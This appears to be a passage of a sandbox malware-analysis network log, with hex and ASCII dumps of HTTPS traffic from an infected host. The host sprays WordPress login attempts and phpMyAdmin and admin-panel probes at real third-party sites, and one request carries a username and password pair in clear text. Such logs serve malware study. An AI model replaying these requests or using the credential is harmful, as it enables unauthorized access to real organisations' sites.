61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 22 20 2f 3e 0a 09 09 09 09 09 Data Ascii: el></p><p class="submit"><input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" /><input type="hidden" name="redirect_to" value="https://fortressrealcapital.com/wp-admin/" />
2024-02-20 23:26:21 UTC	1369	IN	Data Raw: 73 63 72 69 70 74 22 20 69 64 3d 22 7a 78 63 76 62 6e 2d 61 73 79 6e 63 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 5f 7a 78 63 76 62 6e 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 7a 78 63 76 62 6e 2e 6d 69 6e 2e 6a 73 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 7a Data Ascii: script" id="zxcvbn-async-js-extra">/* <![CDATA[ /var _zxcvbnSettings = {"src":"https:\/\/fortressrealcapital.com\/wp-includes\/js\/zxcvbn.min.js"};/ ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/wp-includes/js/z
2024-02-20 23:26:21 UTC	1071	IN	Data Raw: 20 3d 20 7b 22 75 6e 6b 6e 6f 77 6e 22 3a 22 50 61 73 73 77 6f 72 64 20 73 74 72 65 6e 67 74 68 20 75 6e 6b 6e 6f 77 6e 22 2c 22 73 68 6f 72 74 22 3a 22 56 65 72 79 20 77 65 61 6b 22 2c 22 62 61 64 22 3a 22 57 65 61 6b 22 2c 22 67 6f 6f 64 22 3a 22 4d 65 64 69 75 6d 22 2c 22 73 74 72 6f 6e 67 22 3a 22 53 74 72 6f 6e 67 22 2c 22 6d 69 73 6d 61 74 63 68 22 3a 22 4d 69 73 6d 61 74 63 68 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 70 61 73 73 77 6f 72 64 2d 73 74 72 65 6e 67 74 68 2d 6d 65 74 65 Data Ascii: = {"unknown":"Password strength unknown","short":"Very weak","bad":"Weak","good":"Medium","strong":"Strong","mismatch":"Mismatch"};/* ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/wp-admin/js/password-strength-mete
2024-02-20 23:26:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
287	192.168.2.6	57112	51.159.190.167	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	303	OUT	POST /wp-login.php HTTP/1.1 Host: www.cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://cabinet-orsika.fr/wp-login.php Content-Length: 150 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:20 UTC	150	OUT	Data Raw: 6c 6f 67 3d 73 65 63 72 65 74 61 72 69 61 74 26 70 77 64 3d 44 6f 66 6b 73 63 37 38 31 32 33 34 35 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 53 65 2b 63 6f 6e 6e 65 63 74 65 72 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 61 62 69 6e 65 74 2d 6f 72 73 69 6b 61 2e 66 72 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=secretariat&pwd=Dofksc7812345&rememberme=forever&wp-submit=Se+connecter&redirect_to=https%3A%2F%2Fwww.cabinet-orsika.fr%2Fwp-admin%2F&testcookie=1
2024-02-20 23:26:21 UTC	424	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Vary: Accept-Encoding X-Powered-By: PleskLin
2024-02-20 23:26:21 UTC	9086	IN	Data Raw: 31 65 37 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 53 65 20 63 6f 6e 6e 65 63 74 65 72 20 26 6c 73 61 71 75 6f 3b 20 44 72 20 44 6f 6e 20 50 69 65 72 72 65 20 4f 72 73 69 6e 69 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 Data Ascii: 1e71<!DOCTYPE html><html lang="fr-FR"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Se connecter &lsaquo; Dr Don Pierre Orsini — WordPress</title><meta name='robots' content='noindex, follow' /><link

Session ID	Source IP	Source Port	Destination IP	Destination Port
288	192.168.2.6	57276	85.13.138.112	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	166	OUT	GET /admin/ HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:21 UTC	306	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:21 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 03 May 2022 09:55:24 GMT ETag: "4ef-5de1881ee1b00;5de1892c31bf7 Accept-Ranges: bytes Content-Length: 1263 Vary: Accept-Encoding,User-Agent Content-Type: text/html
2024-02-20 23:26:21 UTC	1263	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 69 63 6f 6e 20 68 72 65 66 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3e 3c 74 69 74 6c 65 3e 50 4f 50 55 4c 41 52 20 e2 80 93 20 53 6d 61 72 74 20 63 6f 6d 6d 75 6e 69 63 61 Data Ascii: <!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><link rel=icon href=/favicon.ico><title>POPULAR Smart communica

Session ID	Source IP	Source Port	Destination IP	Destination Port
289	192.168.2.6	57324	51.159.190.167	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	182	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: www.cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:22 UTC	358	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.cabinet-orsika.fr/wp-json/>; rel="https://api.w.org/"
2024-02-20 23:26:22 UTC	16026	IN	Data Raw: 31 64 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 Data Ascii: 1d1b<!DOCTYPE html><html lang="fr-FR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <meta name='robots' content='noindex, follow' />... T
2024-02-20 23:26:22 UTC	16384	IN	Data Raw: 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2e 77 70 2d 65 6c 65 6d 65 6e 74 2d 62 75 74 74 6f 6e 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 37 29 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 5b 61 73 74 2d 62 6c 6f 63 6b 73 2d 6c 61 79 6f 75 74 5d 20 3e 20 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 3b 7d 68 31 2e 77 69 64 67 65 74 2d 74 69 74 6c Data Ascii: .is-style-outline:not(.has-background),.wp-block-button.is-style-outline>.wp-block-button__link.wp-element-button:not(.has-background){background-color:var(--ast-global-color-7);}.entry-content[ast-blocks-layout] > figure{margin-bottom:1em;}h1.widget-titl
2024-02-20 23:26:22 UTC	16384	IN	Data Raw: 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 20 2e 61 6c 69 67 6e 66 75 6c 6c 2c 2e 61 73 74 2d 70 6c 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 2e 61 73 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 20 2e 61 6c 69 67 6e 77 69 64 65 2c 2e 61 73 74 2d 70 61 67 65 2d 62 75 69 6c 64 65 72 2d 74 65 6d 70 6c 61 74 65 2e 61 73 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 20 2e 61 6c 69 67 6e 77 69 64 65 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 Data Ascii: t-no-sidebar .entry-content .wp-block-column .alignfull,.ast-plain-container.ast-no-sidebar .entry-content .wp-block-column .alignwide,.ast-page-builder-template.ast-no-sidebar .entry-content .wp-block-column .alignwide {margin-left: auto;margin-right: au
2024-02-20 23:26:22 UTC	16384	IN	Data Raw: 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 34 35 70 78 3b 7d 2e 73 69 74 65 2d 70 72 69 6d 61 72 79 2d 66 6f 6f 74 65 72 2d 77 72 61 70 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 70 72 69 6d 61 72 79 2d 66 6f 6f 74 65 72 2d 62 75 69 6c 64 65 72 22 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 38 29 3b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 31 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 Data Ascii: dding-bottom:45px;}.site-primary-footer-wrap[data-section="section-primary-footer-builder"]{background-color:var(--ast-global-color-8);;background-image:none;;border-style:solid;border-width:0px;border-top-width:1px;border-top-color:var(--ast-global-color
2024-02-20 23:26:22 UTC	16384	IN	Data Raw: 29 7b 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 2d 77 72 61 70 20 2e 61 73 74 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 62 61 72 2c 2e 61 73 74 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 62 61 72 20 2e 73 69 74 65 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 77 72 61 70 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 70 78 3b 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 34 34 70 78 29 7b 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 2d 77 72 61 70 20 2e 61 73 74 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 62 61 72 20 2c 2e 61 73 74 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 62 61 72 20 2e 73 69 74 65 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 77 72 61 70 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 38 Data Ascii: ){.ast-mobile-header-wrap .ast-primary-header-bar,.ast-primary-header-bar .site-primary-header-wrap{min-height:100px;}}@media (max-width:544px){.ast-mobile-header-wrap .ast-primary-header-bar ,.ast-primary-header-bar .site-primary-header-wrap{min-height:8
2024-02-20 23:26:22 UTC	16384	IN	Data Raw: 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 33 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 33 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 34 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 34 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 35 2d 62 61 Data Ascii: s-ast-global-color-3-background-color{background-color: var(--wp--preset--color--ast-global-color-3) !important;}.has-ast-global-color-4-background-color{background-color: var(--wp--preset--color--ast-global-color-4) !important;}.has-ast-global-color-5-ba
2024-02-20 23:26:22 UTC	16384	IN	Data Raw: 6c 65 2d 70 6f 73 74 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 2e 35 65 6d 3b 7d 2e 73 69 6e 67 6c 65 20 2e 61 73 74 2d 61 75 74 68 6f 72 2d 6d 65 74 61 20 2e 61 73 74 2d 61 75 74 68 6f 72 2d 64 65 74 61 69 6c 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 7d 2e 70 6f 73 74 2d 61 75 74 68 6f 72 2d 62 69 6f 20 2e 61 75 74 68 6f 72 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 32 32 70 78 29 7b 2e 73 69 6e 67 6c 65 20 2e 70 6f 73 74 2d 61 75 74 68 6f 72 2d 61 76 61 74 61 72 2c 2e 73 69 6e 67 6c 65 20 2e 70 6f 73 74 2d 61 75 74 68 6f 72 2d 62 69 6f 7b 66 6c 6f 61 74 3a 6c Data Ascii: le-post:last-child{margin-bottom:2.5em;}.single .ast-author-meta .ast-author-details{display:flex;align-items:center;}.post-author-bio .author-title{margin-bottom:10px;}}@media (min-width:922px){.single .post-author-avatar,.single .post-author-bio{float:l
2024-02-20 23:26:22 UTC	16384	IN	Data Raw: 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 65 6c 65 6d 65 6e 74 6f 72 2d 70 6f 73 74 2d 31 38 32 34 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 62 69 6e 65 74 2d 6f 72 73 69 6b 61 2e 66 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 63 73 73 2f 70 6f 73 74 2d 31 38 32 34 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 37 35 33 34 36 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 73 2d 65 6b 69 74 69 63 6f 6e 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f Data Ascii: 2' media='all' /><link rel='stylesheet' id='elementor-post-1824-css' href='https://www.cabinet-orsika.fr/wp-content/uploads/elementor/css/post-1824.css?ver=1703753462' media='all' /><link rel='stylesheet' id='elementor-icons-ekiticons-css' href='https:/
2024-02-20 23:26:22 UTC	16384	IN	Data Raw: 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 31 39 32 31 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 62 69 6e 65 74 2d 6f 72 73 69 6b 61 2e 66 72 2f 64 72 2d 66 69 72 61 6e 64 65 2d 6b 61 68 61 6c 65 68 2f 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 75 62 2d 69 74 65 6d 20 6d 65 6e 75 2d 6c 69 6e 6b 22 3e 44 72 20 46 69 72 61 6e 64 65 20 4b 41 48 41 4c 45 48 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d Data Ascii: em menu-item-type-post_type menu-item-object-page menu-item-1921"><a href="https://www.cabinet-orsika.fr/dr-firande-kahaleh/" class="elementor-sub-item menu-link">Dr Firande KAHALEH</a></li><li class="menu-item menu-item-type-post_type menu-item-object-
2024-02-20 23:26:22 UTC	16384	IN	Data Raw: 65 6e 74 6f 72 2d 73 75 62 2d 69 74 65 6d 20 6d 65 6e 75 2d 6c 69 6e 6b 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 50 61 72 6f 64 6f 6e 74 6f 6c 6f 67 69 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 31 39 34 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 62 69 6e 65 74 2d 6f 72 73 69 6b 61 2e 66 72 2f 70 72 6f 70 68 79 6c 61 78 69 65 2d 64 65 6e 74 61 69 72 65 2d 6e 6f 69 73 79 2d 6c 65 2d 72 6f 69 2f 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 75 62 2d 69 74 65 6d 20 6d 65 6e 75 Data Ascii: entor-sub-item menu-link" tabindex="-1">Parodontologie</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1942"><a href="https://www.cabinet-orsika.fr/prophylaxie-dentaire-noisy-le-roi/" class="elementor-sub-item menu

Session ID	Source IP	Source Port	Destination IP	Destination Port
290	192.168.2.6	57322	15.161.71.77	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	182	OUT	GET /PhpMyAdmin HTTP/1.1 Host: iisalessandrini.edu.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:21 UTC	418	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:21 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Cache-Control: no-cache, private Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:21 UTC	7	IN	Data Raw: 31 62 66 63 65 0d 0a Data Ascii: 1bfce
2024-02-20 23:26:21 UTC	16384	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 74 22 20 73 74 79 6c 65 3d 22 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 6f 70 61 63 69 74 79 3a 30 3b 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4c 61 20 70 61 67 69 6e 61 20 6e 6f 6e 20 c3 a8 20 73 74 61 Data Ascii: <!doctype html><html lang="it" style="visibility:hidden;opacity:0;"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>La pagina non sta
2024-02-20 23:26:21 UTC	16384	IN	Data Raw: 34 37 2c 30 6c 30 2c 32 31 2e 33 31 6c 36 2e 36 32 34 2c 30 6c 30 2c 2d 31 30 2e 35 36 36 63 30 2c 2d 32 2e 37 38 39 20 30 2e 35 31 35 2c 2d 35 2e 34 38 38 20 33 2e 39 37 38 2c 2d 35 2e 34 38 38 63 33 2e 34 36 33 2c 30 20 33 2e 34 32 37 2c 33 2e 31 39 37 20 33 2e 34 32 37 2c 35 2e 36 36 35 6c 30 2c 31 30 2e 33 38 39 6c 36 2e 36 32 34 2c 30 6c 30 2c 2d 31 31 2e 37 32 31 63 30 2c 2d 35 2e 37 33 36 20 2d 31 2e 32 32 35 2c 2d 31 30 2e 31 35 37 20 2d 37 2e 39 33 38 2c 2d 31 30 2e 31 35 37 5a 6d 2d 32 30 2e 31 39 31 2c 2d 31 30 2e 30 38 37 63 2d 30 2e 30 30 36 2c 30 20 2d 30 2e 30 31 32 2c 30 20 2d 30 2e 30 31 37 2c 30 63 2d 32 2e 31 31 34 2c 30 20 2d 33 2e 38 35 34 2c 31 2e 37 34 20 2d 33 2e 38 35 34 2c 33 2e 38 35 34 63 30 2c 32 2e 31 31 33 20 31 2e 37 34 2c Data Ascii: 47,0l0,21.31l6.624,0l0,-10.566c0,-2.789 0.515,-5.488 3.978,-5.488c3.463,0 3.427,3.197 3.427,5.665l0,10.389l6.624,0l0,-11.721c0,-5.736 -1.225,-10.157 -7.938,-10.157Zm-20.191,-10.087c-0.006,0 -0.012,0 -0.017,0c-2.114,0 -3.854,1.74 -3.854,3.854c0,2.113 1.74,
